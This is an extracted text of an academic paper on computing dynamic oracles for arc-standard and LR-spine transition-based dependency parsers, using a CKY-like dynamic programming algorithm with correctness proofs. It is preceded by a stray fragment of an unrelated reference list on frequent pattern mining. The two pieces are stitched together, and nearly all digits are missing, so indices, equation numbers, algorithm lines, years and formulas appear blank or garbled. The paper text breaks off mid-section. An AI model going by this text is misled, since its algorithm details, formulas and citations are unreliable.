supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agrawal r, imielinski t, swami a. . mining association rules between sets of items in large databases. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://fimi.uantwerpen.be/data/ http://fimi.uantwerpen.be/data/ http://fimi.uantwerpen.be/data/t i d k.dat http://fimi.uantwerpen.be/data/chess.dat http://fimi.uantwerpen.be/data/connect.dat http://fimi.uantwerpen.be/data/mushroom.dat http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. agrawal r, srikant r. . fast algorithms for mining association rules. in: proc. th int. conf. very large data bases, vldb, vol. . – . amphawan k, lenca p, surarerks a. . mining top-k periodicfrequent pattern from transactional databases without support threshold. in: international conference on advances in information technology. springer, – . cheung y-l, fu aw-c. . mining frequent itemsets without support threshold: with and without item constraints. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . fournier-viger p, lin jc-w, kiran ru, koh ys, thomas r. . a survey of sequential pattern mining. data science and pattern recognition ( ): – . fu aw-c, kwong rw-w, tang j. . mining n-most interesting itemsets. in: ismis’ : proceedings of the th international symposium on foundations of intelligent systems. berlin, heidelberg: springer-verlag, – . goethals b. . frequent itemset mining dataset repository. in: frequent itemset mining implementations (fimi’ ), . piscataway: ieee. han j, pei j, yin y. . mining frequent patterns without candidate generation. acm sigmod record ( ): – doi . / . . han j, wang j, lu y, tzvetkov p. . mining top-k frequent closed patterns without minimum support. in: ieee international conference on data mining, . proceedings. piscataway: ieee, – . huynh-thi-le q, le t, vo b, le b. . an efficient and effective algorithm for mining top-rank-k frequent patterns. expert systems with applications ( ): – doi . /j.eswa. . . . krishnamoorthy s. . mining top-k high utility itemsets with effective threshold raising strategies. expert systems with applications : – doi . /j.eswa. . . . nam h, yun u, vo b, truong t, deng z-h, yoon e. a. efficient approach for damped window-based high utility pattern mining with list structure. ieee access : – doi . /access. . . nam h, yun u, yoon e, lin jc-w. b. efficient approach for incremental weighted erasable pattern mining with list structure. expert systems with applications : doi . /j.eswa. . . nguyen lt, vo b, hong t-p, thanh hc. . classification based on association rules: a lattice-based approach. expert systems with applications ( ): – doi . /j.eswa. . . . nguyen lt, vo b, nguyen lt, fournier-viger p, selamat a. . etarm: an efficient top-k association rule mining algorithm. applied intelligence ( ): – . pietracaprina a, vandin f. . efficient incremental mining of top-k frequent closed itemsets. in: discovery science, volume of lecture notes in computer science. berlin heidelberg: springer, – . pyun g, yun u. . mining top-k frequent patterns with combination reducing techniques. applied intelligence ( ): – doi . /s - - - . iqbal et al. 
a tabular method for dynamic oracles in transition-based parsing

yoav goldberg, department of computer science, bar ilan university, israel, yoav.goldberg@gmail.com
francesco sartorio, department of information engineering, university of padua, italy, sartorio@dei.unipd.it
giorgio satta, department of information engineering, university of padua, italy, satta@dei.unipd.it

abstract
we develop parsing oracles for two transition-based dependency parsers, including the arc-standard parser, solving a problem that was left open in (goldberg and nivre, ). we experimentally show that using these oracles during training yields superior parsing accuracies on many languages.

introduction
greedy transition-based dependency parsers (nivre, ) incrementally process an input sentence from left to right. these parsers are very fast and provide competitive parsing accuracies (nivre et al., ). however, greedy transition-based parsers still fall behind search-based parsers (zhang and clark, ; huang and sagae, ) with respect to accuracy. the training of transition-based parsers relies on a component called the parsing oracle, which maps parser configurations to optimal transitions with respect to a gold tree. a discriminative model is then trained to simulate the oracle's behavior. a parsing oracle is deterministic if it returns a single canonical transition. furthermore, an oracle is partial if it is defined only for configurations that can reach the gold tree, that is, configurations representing parsing histories with no mistake. oracles that are both deterministic and partial are called static. traditionally, only static oracles have been exploited in training of transition-based parsers.
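The contrast between the oracle families just defined, and the dynamic oracles introduced next, can be summarized as two function signatures. This is a small illustrative sketch with assumed type names, not an interface from the paper.

```python
from typing import Any, Callable, Optional, Set

# Illustration of the definitions above, not code from the paper: Config,
# GoldTree, and Transition are placeholder type aliases assumed by this sketch.
Config = Any
GoldTree = Any
Transition = str

# a static oracle is deterministic and partial: one canonical transition, and
# possibly undefined (None) once the gold tree is no longer reachable
StaticOracle = Callable[[Config, GoldTree], Optional[Transition]]

# a dynamic oracle is instead nondeterministic and complete: the set of all
# optimal transitions, defined for every reachable configuration
DynamicOracle = Callable[[Config, GoldTree], Set[Transition]]
```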
recently, goldberg and nivre ( ; ) showed that the accuracy of greedy parsers can be substantially improved without affecting their parsing speed. this improvement relies on the introduction of novel oracles that are nondeterministic and complete. an oracle is nondeterministic if it returns the set of all transitions that are optimal with respect to the gold tree, and it is complete if it is well-defined and correct for every configuration that is reachable by the parser. oracles that are both nondeterministic and complete are called dynamic.

goldberg and nivre ( ) develop dynamic oracles for several transition-based parsers. the construction of these oracles is based on a property of transition-based parsers that they call arc decomposition. they also prove that the popular arc-standard system (nivre, ) is not arc-decomposable, and they leave as an open research question the construction of a dynamic oracle for the arc-standard system. in this article, we develop one such oracle (§ ) and prove its correctness (§ ).

an extension to the arc-standard parser was presented by sartorio et al. ( ), which relaxes the bottom-up construction order and allows mixing of bottom-up and top-down strategies. this parser, called here the lr-spine parser, achieves state-of-the-art results for greedy parsing. like the arc-standard system, the lr-spine parser is not arc-decomposable, and a dynamic oracle for this system was not known. we extend our oracle for the arc-standard system to work for the lr-spine system as well (§ ).

the dynamic oracles developed by goldberg and nivre ( ) for arc-decomposable systems are based on local properties of computations. in contrast, our novel dynamic oracle algorithms rely on arguably more complex structural properties of computations, which are computed through dynamic programming. this leaves open the question of whether a machine-learning model can learn to effectively simulate such complex processes: will the benefit of training with the dynamic oracle carry over to the arc-standard and lr-spine systems? we show experimentally that this is indeed the case (§ ), and that using the training-with-exploration method of (goldberg and nivre, ) with our dynamic-programming-based oracles yields superior parsing accuracies on many languages.

arc-standard parser
in this section we introduce the arc-standard parser of nivre ( ), which is the model that we use in this article. to keep the notation at a simple level, we only discuss the unlabeled version of the parser; however, a labeled extension is used in § for our experiments.

preliminaries and notation
the set of non-negative integers is denoted as N0. for i, j ∈ N0 with i ≤ j, we write [i, j] to denote the set {i, i+1, ..., j}. when i > j, [i, j] denotes the empty set. we represent an input sentence as a string w = w0 · · · wn, n ∈ N0, where token w0 is a special root symbol, and each wi with i ∈ [1, n] is a lexical token. for i, j ∈ [ , n] with i ≤ j, we write w[i, j] to denote the substring wi wi+1 · · · wj of w. we write i → j to denote a grammatical dependency of some unspecified type between lexical tokens wi and wj, where wi is the head and wj is the dependent.
a dependency tree for w is a directed, ordered tree t = (vw,a), such that vw = [ ,n] is the set of nodes, a ⊆ vw×vw is the set of arcs, and node is the root. arc (i,j) encodes a dependency i → j, and we will often use the latter notation to denote arcs. . transition-based dependency parsing we assume the reader is familiar with the formal framework of transition-based dependency parsing originally introduced by nivre ( ); see nivre ( ) for an introduction. we only summarize here our notation. transition-based dependency parsers use a stack data structure, where each stack element is associ- ated with a tree spanning (generating) some sub- string of the input w. the parser processes the in- put string incrementally, from left to right, applying at each step a transition that updates the stack and/or consumes one token from the input. transitions may also construct new dependencies, which are added to the current configuration of the parser. we represent the stack data structure as an ordered sequence σ = [σd, . . . ,σ ], d ∈ n , of nodes σi ∈ vw, with the topmost element placed at the right. when d = , we have the empty stack σ = []. sometimes we use the vertical bar to denote the append operator for σ, and write σ = σ′|σ to indicate that σ is the topmost element of σ. the parser also uses a buffer to store the portion of the input string still to be processed. we represent the buffer as an ordered sequence β = [i, . . . ,n] of nodes from vw, with i the first element of the buf- fer. in this way β always encodes a (non-necessarily proper) suffix of w. we denote the empty buffer as β = []. sometimes we use the vertical bar to denote the append operator for β, and write β = i|β′ to in- dicate that i is the first token of β; consequently, we have β′ = [i + , . . . ,n]. when processing w, the parser reaches several states, technically called configurations. a config- uration of the parser relative to w is a triple c = (σ,β,a), where σ and β are a stack and a buffer, respectively, and a ⊆ vw ×vw is a set of arcs. the initial configuration for w is ([], [ , . . . ,n],∅). for the purpose of this article, a configuration is final if it has the form ([ ], [],a), and in a final config- uration arc set a always defines a dependency tree for w. the core of a transition-based parser is the set of its transitions, which are specific to each family of parsers. a transition is a binary relation defined over the set of configurations of the parser. we use symbol ` to denote the union of all transition rela- tions of a parser. a computation of the parser on w is a sequence c , . . . ,cm, m ∈ n , of configurations (defined rel- ative to w) such that ci− ` ci for each i ∈ [ ,m]. we also use the reflexive and transitive closure rela- tion `∗ to represent computations. a computation is called complete whenever c is initial and cm is fi- nal. in this way, a complete computation is uniquely associated with a dependency tree for w. . arc-standard parser the arc-standard model uses the three types of trans- itions formally specified in figure (σ,i|β,a) `sh (σ|i,β,a) (σ|i|j,β,a) `la (σ|j,β,a∪{j → i}) (σ|i|j,β,a) `ra (σ|i,β,a∪{i → j}) figure : transitions in the arc-standard model. 
• shift (sh) removes the first node in the buffer and pushes it into the stack; • left-arc (la) creates a new arc with the topmost node on the stack as the head and the second- topmost node as the dependent, and removes the second-topmost node from the stack; • right-arc (ra) is symmetric to la in that it cre- ates an arc with the second-topmost node as the head and the topmost node as the dependent, and removes the topmost node. notation we sometimes use the functional nota- tion for a transition τ ∈ {sh, la,ra}, and write τ(c) = c′ in place of c `τ c′. naturally, sh applies only when the buffer is not empty, and la,ra require two elements on the stack. we denote by valid(c) the set of valid transitions in a given configuration. . arc decomposition goldberg and nivre ( ) show how to derive dy- namic oracles for any transition-based parser which has the arc decomposition property, defined below. they also show that the arc-standard parser is not arc-decomposable. for a configuration c, we write ac to denote the associated set of arcs. a transition-based parser is arc-decomposable if, for every configuration c and for every set of arcs a that can be extended to a pro- jective tree, we have ∀(i → j) ∈ a,∃c′[c `∗ c′ ∧ (i → j) ∈ ac′ ] ⇒∃c′′[c `∗ c′′ ∧a ⊆ ac′′ ] . in words, if each arc in a is individually derivable from c, then the set a in its entirety can be derived from c as well. the arc decomposition property is useful for deriving dynamic oracles because it is relatively easy to investigate derivability for single arcs and then, using this property, draw conclusions about the number of gold-arcs that are simultan- eously derivable from the given configuration. unfortunately, the arc-standard parser is not arc- decomposable. to see why, consider a configura- tion with stack σ = [i,j,k]. consider also arc set a = {(i,j), (i,k)}. the arc (i,j) can be derived through the transition sequence ra, ra, and the arc (i,k) can be derived through the alternative trans- ition sequence la, ra. yet, it is easy to see that a con- figuration containing both arcs cannot be reached. as we cannot rely on the arc decomposition prop- erty, in order to derive a dynamic oracle for the arc- standard model we need to develop more sophistic- ated techniques which take into account the interac- tion among the applied transitions. configuration loss and dynamic oracles we aim to derive a dynamic oracle for the arc-stand- ard (and related) system. this is a function that takes a configuration c and a gold tree tg and returns a set of transitions that are “optimal” for c with respect to tg. as already mentioned in the introduction, a dynamic oracle can be used to improve training of greedy transition-based parsers. in this section we provide a formal definition for a dynamic oracle. let t and t be two dependency trees over the same string w, with arc sets a and a , respectively. we define the loss of t with respect to t as l(t , t ) = |a \a | . ( ) note that l(t , t ) = l(t , t ), since |a | = |a |. furthermore l(t , t ) = if and only if t and t are the same tree. let c be a configuration of our parser relative to input string w. we write d(c) to denote the set of all dependency trees that can be obtained in a com- putation of the form c `∗ cf , where cf is some final configuration. we extend the loss function in ( ) to configurations by letting l(c,t ) = min t ∈d(c) l(t , t ) . ( ) assume some reference (desired) dependency tree tg for w, which we call the gold tree. 
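To make the preceding definitions concrete, the sketch below implements the three transitions of figure 1 on a (stack, buffer, arcs) configuration, together with the loss of equation (1). The naming and data layout are mine, not the paper's: arcs are represented as (head, dependent) pairs, and the topmost stack element sits at the right end of a Python list.

```python
# Illustrative sketch only; a configuration is a (stack, buffer, arcs) triple,
# with arcs a set of (head, dependent) pairs.

def shift(config):
    stack, buffer, arcs = config
    # sh: move the first buffer node onto the stack
    return (stack + [buffer[0]], buffer[1:], arcs)

def left_arc(config):
    stack, buffer, arcs = config
    # la: topmost node becomes head of the second-topmost node, which is removed
    head, dep = stack[-1], stack[-2]
    return (stack[:-2] + [head], buffer, arcs | {(head, dep)})

def right_arc(config):
    stack, buffer, arcs = config
    # ra: second-topmost node becomes head of the topmost node, which is removed
    head, dep = stack[-2], stack[-1]
    return (stack[:-2] + [head], buffer, arcs | {(head, dep)})

def valid(config):
    stack, buffer, _ = config
    moves = []
    if buffer:                      # sh needs a non-empty buffer
        moves.append(shift)
    if len(stack) >= 2:             # la and ra need two stack elements
        moves.extend([left_arc, right_arc])
    return moves

def tree_loss(arcs_t1, arcs_t2):
    # eq. (1): number of arcs of the first tree that are missing from the second
    return len(arcs_t1 - arcs_t2)

def oracle_from_loss(config, gold_arcs, config_loss):
    # given a routine computing the configuration loss l(c, tg) (this is what
    # the algorithm developed below provides), the oracle is the set of valid
    # transitions that leave that loss unchanged
    base = config_loss(config, gold_arcs)
    return {t for t in valid(config)
            if config_loss(t(config), gold_arcs) == base}
```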
quantity l(c,tg) can be used to compute a dynamic oracle relating a parser configuration c to a set of optimal actions by setting oracle(c,tg) = {τ | l(τ(c), tg) −l(c,tg) = } . ( ) we therefore need to develop an algorithm for com- puting ( ). we will do this first for the arc-standard parser, and then for an extension of this model. notation we also apply the loss function l(t,tg) in ( ) when t is a dependency tree for a substring of w. in this case the nodes of t are a subset of the nodes of tg, and l(t,tg) provides a count of the nodes of t that are assigned a wrong head node, when tg is considered as the reference tree. main algorithm throughout this section we assume an arc-standard parser. our algorithm takes as input a projective gold tree tg and a configuration c = (σl,β,a). we call σl the left stack, in contrast with a right stack whose construction is specified below. . basic idea the algorithm consists of two steps. informally, in the first step we compute the largest subtrees, called here tree fragments, of the gold tree tg that have their span entirely included in the buffer β. the root nodes of these tree fragments are then arranged into a stack data structure, according to the order in which they appear in β and with the leftmost root in β being the topmost element of the stack. we call this structure the right stack σr. intuitively, σr can be viewed as the result of pre-computing β by ap- plying all sequences of transitions that match tg and that can be performed independently of the stack in the input configuration c, that is, σl. in the second step of the algorithm we use dy- namic programming techniques to simulate all com- putations of the arc-standard parser starting in a con- figuration with stack σl and with a buffer consisting of σr, with the topmost token of σr being the first token of the buffer. as we will see later, the search space defined by these computations includes the de- pendency trees for w that are reachable from the in- put configuration c and that have minimum loss. we then perform a viterbi search to pick up such value. the second step is very similar to standard imple- mentations of the cky parser for context-free gram- mars (hopcroft and ullman, ), running on an input string obtained as the concatenation of σl and σr. the main difference is that we restrict ourselves to parse only those constituents in σlσr that dom- inate the topmost element of σl (the rightmost ele- ment, if σl is viewed as a string). in this way, we ac- count for the additional constraint that we visit only those configurations of the arc-standard parser that can be reached from the input configuration c. for instance, this excludes the reduction of two nodes in σl that are not at the two topmost positions. this would also exclude the reduction of two nodes in σr: this is correct, since the associated tree frag- ments have been chosen as the largest such frag- ments in β. the above intuitive explanation will be made mathematically precise in § , where the notion of linear dependency tree is introduced. . construction of the right stack in the first step we process β and construct a stack σr, which we call the right stack associated with c and tg. 
each node of σr is the root of a tree t which satisfies the following properties • t is a tree fragment of the gold tree tg having span entirely included in the buffer β; • t is bottom-up complete for tg, meaning that for each node i of t different from t’s root, the dependents of i in tg cannot be in σl; • t is maximal for tg, meaning that every super- tree of t in tg violates the above conditions. the stack σr is incrementally constructed by pro- cessig β from left to right. each node i is copied into σr if it satisfies any of the following conditions • the parent node of i in tg is not in β; • some dependent of i in tg is in σl or has already been inserted in σr. it is not difficult to see that the nodes in σr are the roots of tree fragments of tg that satisfy the condi- tion of bottom-up completeness and the condition of maximality defined above. . computation of configuration loss we start with some notation. let `l = |σl| and `r = |σr|. we write σl[i] to denote the i-th ele- ment of σl and t(σl[i]) to denote the correspond- ing tree fragment; σr[i] and t(σr[i]) have a similar meaning. in order to simplify the specification of the algorithm, we assume below that σl[ ] = σr[ ]. algorithm computation of the loss function for the arc-standard parser : t [ , ](σl[ ]) ←l(t(σl[ ]), tg) : for d ← to `l + `r − do . d is the index of a sub-anti-diagonal : for j ← max{ ,d− `l + } to min{d,`r} do . j is the column index : i ← d− j + . i is the row index : if i < `l then . expand to the left : for each h ∈ ∆i,j do : t [i + ,j](h) ← min{t [i + ,j](h), t [i,j](h) + δg(h → σl[i + ])} : t [i + ,j](σl[i + ]) ← min{t [i + ,j](σl[i + ]), t [i,j](h) + δg(σl[i + ] → h)} : if j < `r then . expand to the right : for each h ∈ ∆i,j do : t [i,j + ](h) ← min{t [i,j + ](h), t [i,j](h) + δg(h → σr[j + ])} : t [i,j + ](σr[j + ]) ← min{t [i,j + ](σr[j + ]),t [i,j](h) +δg(σr[j + ] → h)} : return t [`l,`r]( ) + ∑ i∈[ ,`l] l(t(σl[i]), tg) therefore the elements of σr which have been con- structed in § . are σr[i], i ∈ [ ,`r]. algorithm uses a two-dimensional array t of size `l × `r, where each entry t [i,j] is an as- sociation list from integers to integers. an entry t [i,j](h) stores the minimum loss among depend- ency trees rooted at h that can be obtained by run- ning the parser on the first i elements of stack σl and the first j elements of buffer σr. more precisely, let ∆i,j = {σl[k] | k ∈ [ , i]}∪ {σr[k] | k ∈ [ ,j]} . ( ) for each h ∈ ∆i,j, the entry t [i,j](h) is the minimum loss among all dependency trees defined as above and with root h. we also assume that t [i,j](h) is initialized to +∞ (not reported in the algorithm). algorithm starts at the top-left corner of t , vis- iting each individual sub-anti-diagonal of t in as- cending order, and eventually reaching the bottom- right corner of the array. for each entry t [i,j], the left expansion is considered (lines to ) by com- bining with tree fragment σl[i + ], through a left or a right arc reduction. this results in the update of t [i + ,j](h), for each h ∈ ∆i+ ,j, whenever a smaller value of the loss is achieved for a tree with root h. the kronecker-like function used at line provides the contribution of each single arc to the loss of the current tree. denoting with ag the set of arcs of tg, such a function is defined as δg(i → j) = { , if (i → j) ∈ ag; , otherwise. ( ) a symmetrical process is implemented for the right expansion of t [i,j] through tree fragment σr[j + ] (lines to ). 
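As a concrete illustration of the right-stack construction described in this section, the sketch below scans the buffer from left to right and keeps exactly the nodes satisfying one of the two membership conditions. The helper names and the gold_heads mapping are assumptions of this sketch, not the paper's notation, and the left stack is treated simply as the set of its nodes.

```python
# A minimal sketch of the right-stack construction.

def build_right_stack(buffer, left_stack, gold_heads):
    """buffer, left_stack: lists of node ids; gold_heads: node -> gold parent."""
    in_buffer = set(buffer)
    stack_nodes = set(left_stack)
    right_stack, selected = [], set()
    for i in buffer:
        gold_dependents = {m for m, h in gold_heads.items() if h == i}
        # condition 1: the gold parent of i lies outside the buffer
        parent_outside_buffer = gold_heads.get(i) not in in_buffer
        # condition 2: some gold dependent of i is on the left stack or has
        # already been selected for the right stack
        blocked_dependent = bool(gold_dependents & (stack_nodes | selected))
        if parent_outside_buffer or blocked_dependent:
            right_stack.append(i)
            selected.add(i)
    # the leftmost selected root comes first, i.e. it is the topmost element
    return right_stack
```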
as we will see in the next section, quantity t [`l,`r]( ) is the minimal loss of a tree composed only by arcs that connect nodes in σl and σr. by summing the loss of all tree fragments t(σl[i]) to the loss in t [`l,`r]( ), at line , we obtain the desired result, since the loss of each tree fragment t(σr[j]) is zero. formal properties throughout this section we let w, tg, σl, σr and c = (σl,β,a) be defined as in § , but we no longer assume that σl[ ] = σr[ ]. to simplify the present- ation, we sometimes identify the tokens in w with the associated nodes in a dependency tree for w. . linear trees algorithm explores all dependency trees that can be reached by an arc-standard parser from configur- ation c, under the condition that (i) the nodes in the buffer β are pre-computed into tree fragments and collapsed into their root nodes in the right stack σr, and (ii) nodes in σr cannot be combined together prior to their combination with other nodes in the left stack σl. this set of dependency trees is char- j i i i j i i j i j j σrσl figure : a possible linear tree for string pair (σl,σr), where σl = i i i i i i and σr = j j j j j . the spine of the tree consists of nodes j , i and i . acterized here using the notion of linear tree, to be used later in the correctness proof. consider two nodes σl[i] and σl[j] with j > i > . an arc-standard parser can construct an arc between σl[i] and σl[j], in any direction, only after reaching a configuration in which σl[i] is at the top of the stack and σl[j] is at the second topmost posi- tion. in such configuration we have that σl[i] dom- inates σl[ ]. furthermore, consider nodes σr[i] and σr[j] with j > i ≥ . since we are assuming that tree fragments t(σr[i]) and t(σr[j]) are bottom-up complete and maximal, as defined in § . , we allow the construction of an arc between σr[i] and σr[j], in any direction, only after reaching a configuration in which σr[i] dominates node σl[ ]. the dependency trees satisfying the restrictions above are captured by the following definition. a linear tree over (σl,σr) is a projective dependency tree t for string σlσr satisfying both of the addi- tional conditions reported below. the path from t’s root to node σl[ ] is called the spine of t. • every node of t not in the spine is a dependent of some node in the spine. • for each arc i → j in t with j in the spine, no dependent of i can be placed in between i and j within string σlσr. an example of a linear tree is depicted in figure . observe that the second condition above forbids the reduction of two nodes i and j, in case none of these dominates node σl[ ]. for instance, the ra reduc- tion of nodes i and i would result in arc i → i replacing arc i → i in figure . the new depend- ency tree is not linear, because of a violation of the second condition above. similarly, the la reduction of nodes j and j would result in arc j → j re- placing arc i → j in figure , again a violation of the second condition above. lemma any tree t ∈ d(c) can be decomposed into trees t(σl[i]), i ∈ [ ,`l], trees tj, j ∈ [ ,q] and q ≥ , and a linear tree tl over (σl,σr,t), where σr,t = r · · ·rq and each rj is the root node of tj. proof (sketch) trees t(σl[i]) are common to every tree in d(c), since the arc-standard model can not undo the arcs already built in the current con- figuration c. similar to the construction in § . 
of the right stack σr from tg, we let tj, j ∈ [ ,q], be tree fragments of t that cover only nodes associated with the tokens in the buffer β and that are bottom- up complete and maximal for t. these trees are in- dexed according to their left to right order in β. fi- nally, tl is implicitly defined by all arcs of t that are not in trees t(σl[i]) and tj. it is not difficult to see that tl has a spine ending with node σl[ ] and is a linear tree over (σl,σr,t). � . correctness our proof of correctness for algorithm is based on a specific dependency tree t∗ for w, which we define below. let sl = {σl[i] | i ∈ [ ,`l]} and let dl be the set of nodes that are descendants of some node in sl. similarly, let sr = {σr[i] | i ∈ [ ,`r]} and let dr be the set of descendants of nodes in sr. note that sets sl,sr,dl and dr provide a partition of vw. we choose any linear tree t∗l over (σl,σr) having root , such that l(t∗l , tg) = mintl(t,tg), where t ranges over all possible linear trees over (σl,σr) with root . tree t∗ consists of the set of nodes vw and the set of arcs obtained as the union of the set of arcs of t∗l and the set of arcs of all trees t(σl[i]), i ∈ [ ,`l], and t(σr[j]), j ∈ [ ,`r]. lemma t∗ ∈d(c). proof (sketch) all tree fragments t(σl[i]) have already been parsed and are available in the stack associated with c. each tree fragment t(σr[j]) can later be constructed in the computation, when a con- figuration c′ is reached with the relevant segment of w at the start of the buffer. note also that parsing of t(σr[j]) can be done in a way that does not depend on the content of the stack in c′. finally, the parsing of the tree fragments t(σr[j]) is interleaved with the construction of the arcs from the linear tree t∗l , which are all of the form (i → j) with i,j ∈ (sl ∪ sr). more precisely, if (i → j) is an arc from t∗l , at some point in the computation nodes i and j will become available at the two top- most positions in the stack. this follows from the second condition in the definition of linear tree. � we now show that tree t∗ is “optimal” within the set d(c) and with respect to tg. lemma l(t∗, tg) = l(c,tg). proof consider an arbitrary tree t ∈ d(c). as- sume the decomposition of t defined in the proof of lemma , through trees t(σl[i]), i ∈ [ ,`l], trees tj, j ∈ [ ,q], and linear tree tl over (σl,σr,t). recall that an arc i → j denotes an ordered pair (i,j). let us consider the following partition for the set of arcs of any dependency tree for w a = (sl ∪dl) ×dl , a = (sr ∪dr) ×dr , a = (vw ×vw) \ (a ∪a ) . in what follows, we compare the losses l(t,tg) and l(t∗, tg) by separately looking into the contribution to such quantities due to the arcs in a , a and a . note that the arcs of trees t(σl[i]) are all in a , the arcs of trees t(σr[j]) are all in a , and the arcs of tree t∗l are all in a . since t and t ∗ share trees t(σl[i]), when restricted to arcs in a quantities l(t,tg) and l(t∗, tg) are the same. when restric- ted to arcs in a , quantity l(t∗, tg) is zero, by con- struction of the trees t(σr[j]). thus l(t,tg) can not be smaller than l(t∗, tg) for these arcs. the difficult part is the comparison of the contribution to l(t,tg) and l(t∗, tg) due to the arcs in a . we deal with this below. let as,g be the set of all arcs from tg that are also in set (sl ×sr) ∪ (sr ×sl). in words, as,g rep- resents gold arcs connecting nodes in sl and nodes in sr, in any direction. 
within tree t, these arcs can only be found in the tl component, since nodes in sl are all placed within the spine of tl, or else at the left of that spine. let us consider an arc (j → i) ∈ as,g with j ∈ sl and i ∈ sr, and let us assume that (j → i) is in t∗l . if token ai does not occur in σr,t, node i is not in tl and (j → i) can not be an arc of t. we then have that (j → i) contributes one unit to l(t,tg) but does not contribute to l(t∗, tg). similarly, let (i → j) ∈ as,g be such that i ∈ sr and j ∈ sl, and assume that (i → j) is in t∗l . if token ai does not occur in σr,t, arc (i → j) can not be in t. we then have that (i → j) contributes one unit to l(t,tg) but does not contribute to l(t∗, tg). intuitively, the above observations mean that the winning strategy for trees in d(c) is to move nodes from sr as much as possible into the linear tree component tl, in order to make it possible for these nodes to connect to nodes in sl, in any direction. in this case, arcs from a will also move into the linear tree component of a tree in d(c), as it happens in the case of t∗. we thus conclude that, when restricted to the set of arcs in a , quantity l(t,tg) is not smal- ler than l(t∗, tg), because stack σr has at least as many tokens corresponding to nodes in sr as stack σr,t, and because t∗l has the minimum loss among all the linear trees over (σl,σr). putting all of the above observations together, we conclude that l(t,tg) can not be smaller than l(t∗, tg). this concludes the proof, since t has been arbitrarily chosen in d(c). � theorem algorithm computes l(c,tg). proof (sketch) algorithm implements a vi- terbi search for trees with smallest loss among all linear trees over (σl,σr). thus t [`l,`r]( ) = l(t∗l , tg). the loss of the tree fragments t(σr[j]) is and the loss of the tree fragments t(σl[i]) is ad- ded at line in the algorithm. thus the algorithm returns l(t∗, tg), and the statement follows from lemma and lemma . � . computational analysis following § . , the right stack σr can be easily constructed in time o(n), n the length of the in- put string. we now analyze algorithm . for each entry t [i,j] and for each h ∈ ∆i,j, we update t [i,j](h) a number of times bounded by a con- stant which does not depend on the input. each up- dating can be computed in constant time as well. we thus conclude that algorithm runs in time o(`l · `r · (`l + `r)). quantity `l+`r is bounded by n, but in practice the former is significantly smal- ler. when measured over the sentences in the penn treebank, the average value of `l+`r n is . . in terms of runtime, training is . times slower when using our oracle instead of a static oracle. extension to the lr-spine parser in this section we consider the transition-based parser proposed by sartorio et al. ( ), called here the lr-spine parser. this parser is not arc- decomposable: the same example reported in § . can be used to show this fact. we therefore extend to the lr-spine parser the algorithm developed in § . . the lr-spine parser let t be a dependency tree. the left spine of t is an ordered sequence 〈i , . . . , ip〉, p ≥ , consisting of all nodes in a descending path from the root of t taking the leftmost child node at each step. the right spine of t is defined symmetrically. we use ⊕ to denote sequence concatenation. in the lr-spine parser each stack element σ[i] de- notes a partially built subtree t(σ[i]) and is represen- ted by a pair (lsi, rsi), with lsi and rsi the left and the right spine, respectively, of t(σ[i]). 
we write lsi[k] (rsi[k]) to represent the k-th element of lsi (rsi, re- spectively). we also write r(σ[i]) to denote the root of t(σ[i]), so that r(σ[i]) = lsi[ ] = rsi[ ]. informally, the lr-spine parser uses the same transition typologies as the arc-standard parser. however, an arc (h → d) can now be created with the head node h chosen from any node in the spine of the involved tree. the transition types of the lr- spine parser are defined as follows. • shift (sh) removes the first node from the buf- fer and pushes into the stack a new element, consisting of the left and right spines of the as- sociated tree (σ,i|β,a) `sh (σ|(〈i〉,〈i〉),β,a) . • left-arc k (lak) creates a new arc h → d from the k-th node in the left spine of the topmost tree in the stack to the head of the second ele- ment in the stack. furthermore, the two top- most stack elements are replaced by a new ele- ment associated with the resulting tree (σ′|σ[ ]|σ[ ],β,a) `lak (σ ′|σlak,β,a∪{h → d}) where we have set h = ls [k], d = r(σ[ ]) and σlak = (〈ls [ ], . . . , ls [k]〉⊕ ls , rs ). • right-arc k (rak for short) is defined symmet- rically with respect to lak (σ′|σ[ ]|σ[ ],β,a) `rak (σ′|σrak,β,a∪{h → d}) where we have set h = rs [k], d = r(σ[ ]) and σrak = (ls ,〈rs [ ], . . . , rs [k]〉⊕ rs ). note that, at each configuration in the lr-spine parser, there are |ls | possible lak transitions, one for each choice of a node in the left spine of t(σ[ ]); similarly, there are |rs | possible rak transitions, one for each choice of a node in the right spine of t(σ[ ]). . configuration loss we only provide an informal description of the ex- tended algorithm here, since it is very similar to the algorithm in § . in the first phase we use the procedure of § . for the construction of the right stack σr, considering only the roots of elements in σl and ignoring the rest of the spines. the only difference is that each element σr[j] is now a pair of spines (lsr,j, rsr,j). since tree fragment t(σr[j]) is bottom-up complete (see § . ), we now restrict the search space in such a way that only the root node r(σr[j]) can take de- pendents. this is done by setting lsr,j = rsr,j = 〈r(σr[j])〉 for each j ∈ [ ,`r]. in order to simplify the presentation we also assume σr[ ] = σl[ ], as done in § . . in the second phase we compute the loss of an in- put configuration using a two-dimensional array t , defined as in § . . however, because of the way transitions are defined in the lr-spine parser, we now need to distinguish tree fragments not only on the basis of their roots, but also on the basis of their left and right spines. accordingly, we define each entry t [i,j] as an association list with keys of the form (ls, rs). more specifically, t [i,j](ls, rs) is the minimum loss of a tree with left and right spines ls and rs, respectively, that can be obtained by running the parser on the first i elements of stack σl and the first j elements of buffer σr. we follow the main idea of algorithm and ex- pand each tree in t [i,j] at its left side, by combin- ing with tree fragment t(σl[i + ]), and at its right side, by combining with tree fragment t(σr[j + ]). tree combination deserves some more detailed dis- cussion, reported below. we consider the combination of a tree ta from t [i,j] and tree t(σl[i + ]) by means of a left-arc transition. all other cases are treated symmetric- ally. let (lsa, rsa) be the spine pair of ta, so that the loss of ta is stored in t [i,j](lsa, rsa). let also (lsb, rsb) be the spine pair of t(σl[i + ]). 
